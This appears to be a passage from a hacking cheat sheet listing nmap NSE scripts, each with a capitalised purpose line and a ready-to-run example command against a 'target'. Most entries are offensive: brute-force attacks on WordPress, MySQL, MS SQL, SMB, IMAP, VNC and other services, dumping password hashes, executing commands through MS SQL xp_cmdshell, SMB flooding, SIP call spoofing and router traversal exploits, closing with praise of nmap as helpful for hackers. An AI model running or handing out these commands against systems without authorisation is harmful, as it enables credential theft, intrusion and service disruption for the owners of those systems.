(nmap --script http-svn-info -p+port +domain or ip of target) e.g.
(nmap --script http-svn-info -p80 192.168.8.4)
TO SHOW THE TILTLE OF DEFAULT PAGE OF TARGET WEBSITE:
(nmap --script http-tplink-dir-traversal.nse -p+port +domain or ip of target) e.g.
(nmap --script http-tplink-dir-traversal.nse -p80 192.168.8.4)
TO EXPLOIT TRAVERSAL VULNERABILITY IN TP-LINK WIFI ROUTERS OF TARGET WEBSITE:
(nmap --script http-tplink-dir-traversal.nse -p+port +domain or ip of target) e.g.
(nmap --script http-tplink-dir-traversal.nse -p80 192.168.8.4)
TO CHECK THE ENABLING OF TRACE METHOD:
(nmap --script http-trace -d -p+port +domain or ip of target) e.g.
(nmap --script http-trace -d -p80 192.168.8.4)
TO FIND VALID USERNAMES OF TARGET WEBSITE:
(nmap -sV --script=http-userdir-enum -p+port +domain or ip of target) e.g.
(nmap -sV --script=http-userdir-enum -p80 vulnweb.com)
TO FIND VIRTUAL HOSTNAMES OF TARGET WEBSITE:
(nmap --script http-vhosts -p+port +domain or ip of target) e.g.
(nmap --script http-vhosts -p80 192.168.8.4)
TO CONNECT TO VLC STREAMER HELPER OF TAGET WEBSITE:
(nmap --script http-vlcstreamer-ls -p+port +domain or ip of target) e.g.
(nmap --script http-vlcstreamer-ls -p4050 192.168.8.4)
TO CHECK TRAVERSAL VULNERABILITY IN VMWARE OF TARGET WEBSITE:
(nmap --script http-vmware-path-vuln -p+port +domain or ip of target) e.g.
(nmap --script http-vmware-path-vuln -p80 192.168.8.4)
TO EXPLOIT FILE DISCLOSURE VULNERABILITY IN WEBMIN OF TARGET WEBSITE:
(nmap -sV --script http-vuln-cve2006-3392 -p+port +domain or ip of target) e.g.
(nmap -sV --script http-vuln-cve2006-3392 -p80 vulnweb.com)
TO EXPLOIT ADOBE XML EXTERNAL ENTITY INJECTION IN TARGET:
(nmap --script=http-vuln-cve2009-3960 -p+port +domain or ip of target) e.g.
(nmap --script=http-vuln-cve2009-3960 -p80 192.168.8.4)
TO FIND JMX CONSOLE AUTHENTICATION BYPASS VULNERABILITY IN TARGET:
(nmap --script=http-vuln-cve2010-0738 -p+port +domain or ip of target) e.g.
(nmap --script=http-vuln-cve2010-0738 -p80 192.168.8.4)
TO GRAB THE PASSWORD HASHES OF ADMIN USER OF TARGET:
(nmap --script http-vuln-cve2010-2861 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2010-2861 -p80 192.168.8.4)
TO DETECT DOS ATTACK VULNERABILITY IN TARGET APACHE SERVER:
(nmap --script http-vuln-cve2011-3192.nse -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2011-3192.nse -p80 192.168.8.4)
TO FIND REVERSE PROXY BYPASS VULNERABILITY IN TARGET HHTP APACHE SERVER:
(nmap --script http-vuln-cve2011-3368 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2011-3368 -p80 192.168.8.4)
TO DETECT PHP-CGI INSTALLATION IN TARGET:
(nmap -sV --script http-vuln-cve2012-1823 -p+port +domain or ip of target) e.g.
(nmap -sV --script http-vuln-cve2012-1823 -p80 192.168.8.4)
TO DETECT RUBY ON RAIL SERVER VULNERABLE TO OBJECT INJECTION:
(nmap -sV --script http-vuln-cve2013-0156 -p+port +domain or ip of target) e.g.
(nmap -sV --script http-vuln-cve2013-0156 -p80 192.168.8.4)
TO DETECT ASDM PREVILAGE ESCALATION VULNERABILITY IN CISCO ASA OF TARGET:
(nmap --script http-vuln-cve2014-2126 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2014-2126 -p8082 192.168.8.4)
TO DETECT VPN PREVILAGE ESCALATION VULNERABILITY IN CISCO ASA OF TARGET
(nmap --script http-vuln-cve2014-2127 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2014-2127 -p80 192.168.8.4)
TO DETECT VPN AUTHENTICATION VULNERABILITY IN CISCO ASA OF TARGET:
(nmap --script http-vuln-cve2014-2128 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2014-2128 -p80 192.168.8.4)
TO DETECT SIP DOS VULNERABILITY IN CISCO ASA OF TARGET:
(nmap --script http-vuln-cve2014-2129 -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2014-2129 -p80 192.168.8.4)
TO DETECT RCE VULNERABILITY IN TARGET:
(nmap --script=http-vuln-cve2015-1427 -p+port +domain or ip of target) e.g.
(nmap --script=http-vuln-cve2015-1427 -p80 192.168.8.4)
TO DETECT RCE VULNERABILITY IN MS WINDOWS SYSTEM OF TARGET:
(nmap --script http-vuln-cve2015-1635.nse -p+port +domain or ip of target) e.g.
(nmap --script http-vuln-cve2015-1635.nse -p80 192.168.8.4)
TO DETECT ROMPAGER 4.07 MISFORTUNE COOKIE VULNERABILITY:
(nmap --script=http-vuln-misfortune-cookie -p+port +domain or ip of target) e.g.
(nmap --script=http-vuln-misfortune-cookie -p80 192.168.8.4)
TO DETECT FIREWALL OF TARGET:
(nmap --script http-waf-detect -p+port +domain or ip of target) e.g.
(nmap --script http-waf-detect -p80 192.168.8.4)
TO DETECT THE DETAIL OF FIREWALL OF TARGET WEBSITE:
(nmap --script=http-waf-fingerprint -p+port +domain or ip of target) e.g.
(nmap --script=http-waf-fingerprint -p8087 192.168.8.4)
Firewall of target website or ip
TO DETECT WEBDAV INSTALLATIONS ON TARGET WEBSITE:
(nmap --script http-webdav-scan -p+port +domain or ip of target) e.g.
(nmap --script http-webdav-scan -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON WORDPRESS CMS INSTALLATIONS OF TARGET WEB:
(nmap -sV --script http-wordpress-brute -p+port +domain or ip of target) e.g.
(nmap -sV --script http-wordpress-brute -p80 vulnweb.com)
TO GET INFORMATION OF WORDPRESS TARGET WESITE:
(nmap -sV --script http-wordpress-enum -p+port +domain or ip of target) e.g.
(nmap -sV --script http-wordpress-enum -p80 192.168.8.4)
TO GET USERNAMES OF TARGET WORDPRESS WEBSITE:
(nmap --script http-wordpress-users -p+port +domain or ip of target) e.g.
(nmap --script http-wordpress-users -p80 192.168.8.4)
TO SEARCH THE XSSED.COM DATABASES ON TARGET WEBSITE:
(nmap --script http-xssed.nse -p+port +domain or ip of target) e.g.
(nmap --script http-xssed.nse -p4550 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IAX2 PROTOCOL:
(nmap -sU --script iax2-brute -p+port +domain or ip of target) e.g.
(nmap -sU --script iax2-brute -p4551 192.168.8.4)
TO DISCOVER THE INFORMATION OF IKE SERVICE ON TARGET WEBSITE:
(nmap -sU --script ike-version -p+port +domain or ip of target) e.g.
(nmap -sU --script ike-version -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IMAP PROTOCOL:
(nmap --script imap-brute -p+port +domain or ip of target) e.g.
(nmap --script imap-brute -p4543 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IBM INFORMIX DYNAMIC SERVER:
(nmap --script informix-brute -p+port +domain or ip of target) e.g.
(nmap --script informix-brute -p80 192.168.8.4)
TO DISCOVER THE LOCATION OF TARGET IP ADDRESS:
(nmap --script ip-geolocation-geoplugin -p+port +domain or ip of target) e.g.
(nmap --script ip-geolocation-geoplugin -p80 192.168.8.4)
TO CHECK IRC SERVERS FOR CHANNELS USED BY MALICIOUS BOTNETS:
(nmap --script=irc-botnet-channels -p+port +domain or ip of target) e.g.
(nmap --script=irc-botnet-channels -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IRC SERVERS:
(nmap --script irc-brute -p+port +domain or ip of target) e.g.
(nmap --script irc-brute -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IRC SERVERS THAT USES SASL AUTHENTICATION:
(nmap --script irc-sasl-brute -p+port +domain or ip of target) e.g.
(nmap --script irc-sasl-brute -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON ISCSI TARGETS:
(nmap -sV --script=iscsi-brute -p+port +domain or ip of target) e.g.
(nmap -sV --script=iscsi-brute -p80 192.168.8.4)
TO GET INFORMATION OF ISCSI TARGETS:
(nmap --script isns-info -p+port +domain or ip of target) e.g.
(nmap --script isns-info -p80 192.168.8.4)
TO DISCOVER KNX GETWAY OF TARGET:
(nmap --script knx-gateway-discover -e interface + domain or ip of target) e.g.
(nmap --script knx-gateway-discover -e wlan0 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON LDAP AUTHENTICATION OF TARGET:
(nmap --script ldap-brute -p+port +domain or ip of target) e.g.
(nmap --script ldap-brute -p7890 192.168.8.4)
TO GET INFORMATION FROM MAX DB OF TARGET:
(nmap --script maxdb-info -p+port +domain or ip of target) e.g.
(nmap --script maxdb-info -p4567 192.168.8.4)
TO PERFORM BRUTE FORCE ATTAC ON COUCHBASE MEMBASE SERVER OF TARGET:
(nmap --script membase-brute -p+port +domain or ip of target) e.g.
(nmap --script membase-brute -p80 192.168.8.4)
TO GET INFORMATION FROM COUCHBASE WEB PORT OF TARGET:
(nmap --script membase-http-info -p+port +domain or ip of target) e.g.
(nmap --script membase-http-info -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON METASPLOIT PPC SERVER OF TARGET:
(nmap --script metasploit-xmlrpc-brute -p+port +domain or ip of target) e.g.
(nmap --script metasploit-xmlrpc-brute -p5555 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON MIKROTIK ROUTEROS DEVICES:
(nmap --script mikrotik-routeros-brute -p+port +domain or ip of target) e.g.
(nmap --script mikrotik-routeros-brute -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON RPA TECH MOBILE MOUSE SERVER OF TARGET:
(nmap --script mmouse-brute -p+port +domain or ip of target) e.g.
(nmap --script mmouse-brute -p1232 192.168.8.4)
TO GET TABLES OF DATABASE FROM MONGODB DATABASE OF TARGET:
(nmap --script mongodb-databases -p+port +domain or ip of target) e.g.
(nmap --script mongodb-databases -p80 192.168.8.4)
TO GET INFORMATION FROM MONGODB DATABASE SERVER OF TARGET:
(nmap --script mongodb-info -p+port +domain or ip of target) e.g.
(nmap --script mongodb-info -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON MS SQL SERVER OF TARGET:
(nmap --script ms-sql-brute -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-brute -p365 192.168.8.4)
TO GET MICROSOFT SQL BROWSER SERVICE:
(nmap -sU --script ms-sql-dac -p+port +domain or ip of target) e.g.
(nmap -sU --script ms-sql-dac -p365 192.168.8.4)
TO GET HASHED PASSWORD FROM MS SQL SERVER OF TARGET:
(nmap --script ms-sql-dump-hashes -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-dump-hashes -p365 192.168.8.4)
TO PERFORM ATTACK ON MS SQL SERVER OF TARGET USING EMPTY PASSWORD:
(nmap --script ms-sql-empty-password -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-empty-password -p365 192.168.8.4)
TO GET INFORMATION FROM MS SQL SEROF TARGET:
(nmap --script ms-sql-info -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-info -p365 192.168.8.4)
TO GET THE TABLES FROM EACH MS SQL DATABASE OF TARGET:
(nmap --script ms-sql-tables -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-tables -p365 192.168.8.4)
TO RUN THE COMMANDS ON TARGET SYSTEM USING SHELL OF MS SQL SERVER:
(nmap --script ms-sql-xp-cmdshell -p+port +domain or ip of target) e.g.
(nmap --script ms-sql-xp-cmdshell -p365 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON MYSQL SERVICE:
(nmap --script=mysql-brute -p+port +domain or ip of target) e.g.
(nmap --script=mysql-brute -p365 192.168.8.4)
TO GET THE LIST OF ALL DATABASE FROM MYSQL SERVER OF TARGET:
(nmap -sV --script=mysql-databases -p+port +domain or ip of target) e.g.
(nmap -sV --script=mysql-databases -p365 192.168.8.4)
TO GET PASSWORD HASHES FROM MYSQL SERVER OF TARGET:
(nmap --script mysql-dump-hashes -p+port +domain or ip of target) e.g.
(nmap --script mysql-dump-hashes -p365 192.168.8.4)
TO FIND THE USERS OF MYSQL SERVER OF TARGET WITH EMPTY PASSWORD:
(nmap -sV --script=mysql-empty-password -p+port +domain or ip of target) e.g.
(nmap -sV --script=mysql-empty-password -p365 192.168.8.4)
TO FIND THE VALID USERS OF MYSQL SERVICE OF TARGET:
(nmap --script=mysql-enum -p+port +domain or ip of target) e.g.
(nmap --script=mysql-enum -p365 192.168.8.4)
TO GET THE LIST OF ALL USERS OF MYSQL SERVICE OF TARGET:
(nmap -sV --script=mysql-users -p+port +domain or ip of target) e.g.
(nmap -sV --script=mysql-users -p365 192.168.8.4)
TO GET THE LIST OF ALL VARIABLES OF MYSQL SERVER OF TARGET:
(nmap -sV --script=mysql-variables -p+port +domain or ip of target) e.g.
(nmap -sV --script=mysql-variables -p365 192.168.8.4)
TO FIND NETBUS AUTHENTICATION BYPASS VULNERABILITY IN TARGET:
(nmap --script netbus-auth-bypass -p+port +domain or ip of target) e.g.
(nmap --script netbus-auth-bypass -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON NETBUS OF TARGET:
(nmap --script netbus-brute -p+port +domain or ip of target) e.g.
(nmap --script netbus-brute -p80 192.168.8.4)
TO SEND FINS PACKET TO TARGET:
(nmap --script omron-info -p+port +domain or ip of target) e.g.
(nmap --script omron-info -p80 192.168.8.4)
TO GET INFORMATION OF OPENLOOKUP SERVER:
(nmap --script openlookup-info -p+port +domain or ip of target) e.g.
(nmap --script openlookup-info -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON OPENVAS VULNERABILITY:
(nmap -sV --script=openvas-otp-brute -p+port +domain or ip of target) e.g.
(nmap -sV --script=openvas-otp-brute -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON ORACLE SERVER:
(nmap --script oracle-brute -p+port +domain or ip of target) e.g.
(nmap --script oracle-brute -p80 192.168.8.4)
TO EXPLOIT CVE-2012-3137 VULNERABILITY IN ORACLE SERVER OF TARGET:
(nmap --script oracle-brute-stealth -p+port +domain or ip of target) e.g.
(nmap --script oracle-brute-stealth -p80 192.168.8.4)
TO GET THE VALID ORACLE USERS OF TARGET:
(nmap --script oracle-enum-users -p+port +domain or ip of target) e.g.
(nmap --script oracle-enum-users -p80 192.168.8.4)
TO DISCOVER PATH MTU OF TARGET:
(nmap --script path-mtu -p+port +domain or ip of target) e.g.
(nmap --script path-mtu -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON PC ANYWHERE PROTOCOL OF TARGET:
(nmap --script=pcanywhere-brute -p+port +domain or ip of target) e.g.
(nmap --script=pcanywhere-brute -p2345 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON POSTGRESQL SERVICE OF TARGET:
(nmap --script pgsql-brute -p+port +domain or ip of target) e.g.
(nmap --script pgsql-brute -p55555 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON POP3:
(nmap -sV --script=pop3-brute -p+port +domain or ip of target) e.g.
(nmap -sV --script=pop3-brute -p80 192.168.8.4)
TO GET THE SECURITY DETAILS OF RDP OF TARGET:
(nmap --script rdp-enum-encryption -p+port +domain or ip of target) e.g.
(nmap --script rdp-enum-encryption -p80 192.168.8.4)
TO CHECK MS12-020 RDP VULNERABILITY IN TARGET:
(nmap -sV --script=rdp-vuln-ms12-020 -p+port +domain or ip of target) e.g.
(nmap -sV --script=rdp-vuln-ms12-020 -p80 192.168.8.4)
TO CHECK REAL VNC AUTHENTICATION BYPASS VULNERABILITY IN TARGET:
(nmap -sV --script=realvnc-auth-bypass -p+port +domain or ip of target) e.g.
(nmap -sV --script=realvnc-auth-bypass -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON REDIS KEY VALUE STORE OF TARGET:
(nmap --script redis-brute -p+port +domain or ip of target) e.g.
(nmap --script redis-brute -p80 192.168.8.4)
TO GET INFORMATION FROM REDIS KEY VALUE STORE OF TARGET:
(nmap --script redis-info -p+port +domain or ip of target) e.g.
(nmap --script redis-info -p80 +domain or ip of target)
TO PERFORM BRUTE FORCE ATTACK ON UNIX REXEC SERVICE OF TARGET:
(nmap --script rexec-brute -p+port +domain or ip of target) e.g.
(nmap --script rexec-brute -p7856 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON UNIX RLOGIN SERVICE OF TARGET:
(nmap --script rlogin-brute -p+port +domain or ip of target) e.g.
(nmap --script rlogin-brute -p7856 192.168.8.4)
TO CONNECT TO REMOTE RMI REGISTRY OF OF TARGET:
(nmap --script rmi-dumpregistry -p+port +domain or ip of target) e.g.
(nmap --script rmi-dumpregistry -p80 192.168.8.4)
TO GET THE INFORMATION OF RPC PORT OF TARGET:
(nmap --script rpc-grind -p+port +domain or ip of target) e.g.
(nmap --script rpc-grind -p7899 192.168.8.4)
TO GET INFORMATION OF RPCAP SERVICE OF TARGET:
(nmap --script rpcap-info -p+port +domain or ip of target) e.g.
(nmap --script rpcap-info -p56 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON RSYNC PROTOCOL OF TARGET:
(nmap --script rsync-brute -p+port +domain or ip of target) e.g.
(nmap --script rsync-brute -p58 192.168.8.4)
TO GET THE IST OF MODULES AVAILABLE FOR RSYNC:
(nmap --script rsync-list-modules -p+port +domain or ip of target) e.g.
(nmap --script rsync-list-modules -p58 192.168.8.4)
TO GET THE DETAIL RELATED TO RTSP FOR CAMERAS:
(nmap --script rtsp-methods -p+port +domain or ip of target) e.g.
(nmap --script rtsp-methods -p554 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON LINKS RELATED TO RTSP OF TARGET:
(nmap --script rtsp-url-brute -p+port +domain or ip of target ) e.g.
(nmap --script rtsp-url-brute -p554 192.168.8.4)
TO GET THE DETAIL OF S7 PLC DEVICES OF TARGET:
(nmap --script s7-info.nse -p+port +domain or ip of target) e.g.
(nmap --script s7-info.nse -p80 192.168.8.4)
TO CHECK SAMBA HEAP OVERFLOW VULNERABILITY IN TARGET:
(nmap --script=samba-vuln-cve-2012-1182 -p+port +domain or ip of target) e.g.
(nmap --script=samba-vuln-cve-2012-1182 -p53 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON SIP OF TARGET:
(nmap -sU --script=sip-brute -p+port +domain or ip of target) e.g.
(nmap -sU --script=sip-brute -p59 192.168.8.4)
TO SPOOF THE CALL ON SIP PHONE OF TARGET:
(nmap --script=sip-call-spoof -p+port +domain or ip of target) e.g.
(nmap --script=sip-call-spoof -p59 192.168.8.4)
TO DISCOVER THE VALID USERS OF SIP OF TARGET:
(nmap --script=sip-enum-users -p+port +domain or ip of target) e.g.
(nmap --script=sip-enum-users -p59 192.168.8.4)
TO FIND THE SIP METHODS OF SERVER OF TARGET:
(nmap --script=sip-methods -sU -p+port +domain or ip of target) e.g.
(nmap --script=sip-methods -sU -p59 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON SMB OF TARGET:
(nmap --script smb-brute.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-brute.nse -p64 192.168.8.4)
TO FIND THE DOMAINS OF TARGET SYSTEM:
(nmap --script smb-enum-domains.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-enum-domains.nse -p80 192.168.8.4)
TO FLOOD ON THE SMB OF TARGET:
(nmap --script smb-flood.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-flood.nse -p64 192.168.8.4)
TO GET THE DETAIL OF FILES OF SMB OF TARGET:
(nmap --script smb-ls -p+port +domain or ip of target) e.g.
(nmap --script smb-ls -p64 192.168.8.4)
TO GET INFORMATION MANAGED BY MASTER BROWSER OF TARGET WINDOW:
(nmap --script smb-mbenum -p+port +domain or ip of target) e.g.
(nmap --script smb-mbenum -p80 192.168.8.4)
TO GET THE INFORMATION OF OPERATING SYSTEM OF TARGET:
(nmap --script smb-os-discovery.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-os-discovery.nse -p80 192.168.8.4)
TO CHECK THE SECURITY LEVEL OF SMB SERVICE OF TARGET:
(nmap --script smb-security-mode.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-security-mode.nse -p64 192.168.8.4)
TO FIND THE SMB SERVER STATISTICS OF TARGET:
(nmap --script smb-server-stats.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-server-stats.nse -p64 192.168.8.4)
TO GET SOME INFORMATION ABOUT THE OS OF TARGET:
(nmap --script smb-system-info.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-system-info.nse -p80 192.168.8.4)
TO CHECK CONFICKER VULNERABILITY IN WINDOWS OS OF TARGET:
(nmap --script smb-vuln-conficker.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-vuln-conficker.nse -p80 192.168.8.4)
TO CHECK DOS VULNERABILITY IN WINDOWS OS OF TARGET:
(nmap --script smb-vuln-cve2009-3103.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-vuln-cve2009-3103.nse -p80 192.168.8.4)
TO CHECK MS06-025 VULNERABILITY IN WINDOWS OS OF TARGET:
(nmap --script smb-vuln-ms06-025.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-vuln-ms06-025.nse -p80 192.168.8.4)
TO CHECK MS07-029 VULNERABILITY IN WINDOWS OS OF TARGET:
(nmap --script smb-vuln-ms07-029.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-vuln-ms07-029.nse -p80 192.168.8.4)
TO CHECK MS08-067 VULNERABILITY IN WINDOWS OS OF TARGET:
(nmap --script smb-vuln-ms08-067.nse -p+port +domain or ip of target) e.g.
(nmap --script smb-vuln-ms08-067.nse -p80 192.168.8.4)
TO CHECK MS10-054 VULNERABILITY OS OF TARGET:
(nmap --script=smb-vuln-ms10-054 -p+port +domain or ip of target) e.g.
(nmap --script=smb-vuln-ms10-054 -p80 192.168.8.4)
TO CHECK MS10-061 VULNERABILITY IN TARGET OS:
(nmap --script=smb-vuln-ms10-061 -p+port +domain or ip of target) e.g.
(nmap --script=smb-vuln-ms10-061 -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON SMTP SERVER OF TARGET:
(nmap --script smtp-brute -p+port +domain or ip of target) e.g.
(nmap --script smtp-brute -p465 192.168.8.4)
TO RUN SMTP COMMANDS ON TARGET SMTP SERVICE:
(nmap --script smtp-commands.nse -p+port +domain or ip of target) e.g.
(nmap --script smtp-commands.nse -p465 192.168.8.4)
TO FIND THE VALID USERS OF SMTP SERVER OF TARGET:
(nmap --script smtp-enum-users.nse -p+port +domain or ip of target) e.g.
(nmap --script smtp-enum-users.nse -p465 192.168.8.4)
TO CHECK THE PORT OF SMTP SERVICE OF TARGET:
(nmap -sV --script=smtp-strangeport +domain or ip of target) e.g.
(nmap -sV --script=smtp-strangeport 192.168.8.4)
TO DISCOVER NETWORK INTERFACES OF TARGET USING SNMP:
(nmap -sU --script=snmp-interfaces -p+port +domain or ip of target) e.g.
(nmap -sU --script=snmp-interfaces -p467 192.168.8.4)
TO DISCOVER PROCESSES RUNNING USING SNMP ON TARGET SYSTEM:
(nmap -sU --script=snmp-processes -p+port +domain or ip of target) e.g.
(nmap -sU --script=snmp-processes -p467 192.168.8.4)
TO GET INFORMATION OF TARGET SYSTEM USING SNMP VERSION 1 SERVICE:
(nmap -sU --script snmp-sysdescr -p+port +domain or ip of target) e.g.
(nmap -sU --script snmp-sysdescr -p467 192.168.8.4)
TO GET THE WINDOWS SHARES OF TARGET:
(nmap -sU --script=snmp-win32-shares -p+port +domain or ip of target) e.g.
(nmap -sU --script=snmp-win32-shares -p80 192.168.8.4)
TO FIND THE SOFTWARES INSTALLED ON TARGET SYSTEM:
(nmap -sU --script=snmp-win32-software -p+port +domain or ip of target) e.g.
(nmap -sU --script=snmp-win32-software -p80 192.168.8.4)
TO FIND THE USERS OF TARGET WINDOWS OS:
(nmap -sU --script=snmp-win32-users -p+port +domain or ip of target) e.g.
(nmap -sU --script=snmp-win32-users -p80 192.168.8.4)
TO CHECK THE RUNNING OF OPEN SOCKS PROXY ON TARGET OS:
(nmap --script=socks-open-proxy -p+port +domain or ip of target) e.g.
(nmap --script=socks-open-proxy -p8080 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON SVN OF TARGET:
(nmap --script svn-brute -p+port +domain or ip of target) e.g.
(nmap --script svn-brute -p567 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON TELNET SERVER OF TARGET:
(nmap --script telnet-brute -p+port +domain or ip of target) e.g.
(nmap --script telnet-brute -p543 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON VNC SERVER OF TARGET:
(nmap --script vnc-brute -p+port +domain or ip of target) e.g.
(nmap --script vnc-brute -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON XMPP SERVICE OF TARGET:
(nmap --script xmpp-brute -p+port +domain or ip of target) e.g.
(nmap --script xmpp-brute -p9098 192.168.8.4)
So nmap is all in one tool that is very helpful for hackers.